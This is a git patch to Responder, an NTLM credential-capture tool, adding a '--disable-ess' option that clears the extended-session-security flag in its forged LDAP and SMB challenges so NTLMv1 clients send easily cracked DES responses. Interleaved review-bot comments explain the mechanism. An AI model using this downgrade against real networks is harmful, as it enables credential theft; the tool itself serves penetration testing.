From baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516 Mon Sep 17 00:00:00 2001
From: pixis
Date: Fri, 14 May 2021 11:45:18 +0200
Subject: [PATCH] Add ESS downgrade parameter

---
 README.md | 1 +
 Responder.py | 1 +
 packets.py | 6 +++---
 settings.py | 1 +
 utils.py | 1 +
 5 files changed, 7 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 44a8baa..bc14d7c 100644
--- a/README.md
+++ b/README.md
@@ -163,6 +163,7 @@ Options:
 with -r. Default: Off
 --lm Force LM hashing downgrade for Windows XP/2003 and
 earlier. Default: Off
+ --disable-ess Force ESS downgrade. Default: Off
 -v, --verbose Increase verbosity.
diff --git a/Responder.py b/Responder.py
index 2b62977..302bdf1 100755
--- a/Responder.py
+++ b/Responder.py
@@ -43,6 +43,7 @@ parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM
 parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
 parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
+parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
diff --git a/packets.py b/packets.py
index 77036bd..4f5acb3 100644
--- a/packets.py
+++ b/packets.py
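Review bot: The help string `"Force ESS downgrade. Default: False"` on the new `--disable-ess` option (and the matching README line) tells an operator neither what is being downgraded nor what they give up by enabling it. ESS here is NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (0x00080000) in the NTLM CHALLENGE; clearing it asks an NTLMv1-capable client for the plain DES response computed directly over the server challenge instead of the NTLM2-session variant (DES over MD5(challenge || client nonce)), which is what makes the capture tractable with precomputed tables against a fixed challenge, while NTLMv2 responses are unaffected by the bit. The trade-off, as I read the NTLM minimum-client-security policy, is that hosts configured to require NTLM2 session security will abort authentication rather than downgrade, so those captures are lost entirely when the option is on. I'd put both halves in the help text: `help="Force ESS downgrade: clear NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY in the NTLM challenge so NTLMv1 clients send the plain DES response (clients that require NTLM2 session security will refuse to authenticate; NTLMv2 is unaffected). Default: False"`.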
@@ -791,7 +791,7 @@ class LDAPNTLMChallenge(Packet):
 ("NTLMSSPNtWorkstationLen", "\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen", "\x94\x00"),
@@ -1331,7 +1331,7 @@ class SMBSession1Data(Packet):
 ("NTLMSSPNtWorkstationLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -1651,7 +1651,7 @@ class SMB2Session1Data(Packet):
 ("NTLMSSPNtWorkstationLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen","\x94\x00"),
diff --git a/settings.py b/settings.py
index b96f127..3c02527 100644
--- a/settings.py
+++ b/settings.py
@@ -176,6 +176,7 @@ class Settings:
 # CLI options
 self.ExternalIP = options.ExternalIP
 self.LM_On_Off = options.LM_On_Off
+ self.NOESS_On_Off = options.NOESS_On_Off
 self.WPAD_On_Off = options.WPAD_On_Off
 self.Wredirect = options.Wredirect
 self.NBTNSDomain = options.NBTNSDomain
diff --git a/utils.py b/utils.py
index 7a71c83..7045d18 100644
--- a/utils.py
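Review bot: The two four-byte literals in the new `NTLMSSPNtNegotiateFlags` entry of `LDAPNTLMChallenge` are opaque: nothing tells a reader which flag differs between `\x15\x82\x81\xe2` and `\x15\x82\x89\xe2` or why. The field is a little-endian uint32, so the only difference is bit 0x00080000, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY, cleared in the NOESS variant with every other negotiated bit left intact; that is the whole mechanism of the option and it deserves a comment on the line above it: `# --disable-ess: clear NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (0x00080000) so an NTLMv1 client answers with the plain DES response over our challenge rather than the NTLM2-session MD5(challenge||nonce) form; NTLMv2 clients are unaffected`. The field list this line belongs to starts and ends outside the hunk.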
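Review bot: `settings.Config.NOESS_On_Off` in the new `NTLMSSPNtNegotiateFlags` entry of `SMBSession1Data` is evaluated when the enclosing field list is built, and if that list is a class attribute (the hunk header points at the class body; the list's start is outside the hunk) the lookup happens once at import of packets.py rather than per connection. The option then silently depends on `settings.Config.populate()` having run before this module is first imported — otherwise the read either raises on an unpopulated Config or bakes in the default and the flag does nothing. I'd record that ordering requirement in a comment next to the entry (`# read at import time: settings.Config must be populated before packets is imported`), or move the flag selection into whatever per-connection code already rewrites this header (the adjacent `NTLMSSPNtServerChallenge` is presumably replaced at runtime with the configured challenge, which would be the natural place; I cannot see that path from the hunk).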
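Review bot: The `SMB2Session1Data` hunk is the third identical copy of `"\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"` in this file (the LDAP and SMB1 challenge packets carry the same expression), so the meaning of the ESS bit now lives in three pairs of unnamed byte strings that must be kept in sync by hand. A module-level pair of constants, e.g. `NTLM_CHALLENGE_FLAGS = "\x15\x82\x89\xe2"` and `NTLM_CHALLENGE_FLAGS_NOESS = "\x15\x82\x81\xe2"  # EXTENDED_SESSIONSECURITY (0x00080000) cleared`, referenced from all three field lists, would keep the challenge types from drifting the next time a flag is toggled. Not blocking, but these are exactly the literals that get half-updated later.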
+++ b/utils.py
@@ -403,6 +403,7 @@ def StartupMessage():
 print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
 print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
 print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
+ print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled))
 print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
 print('')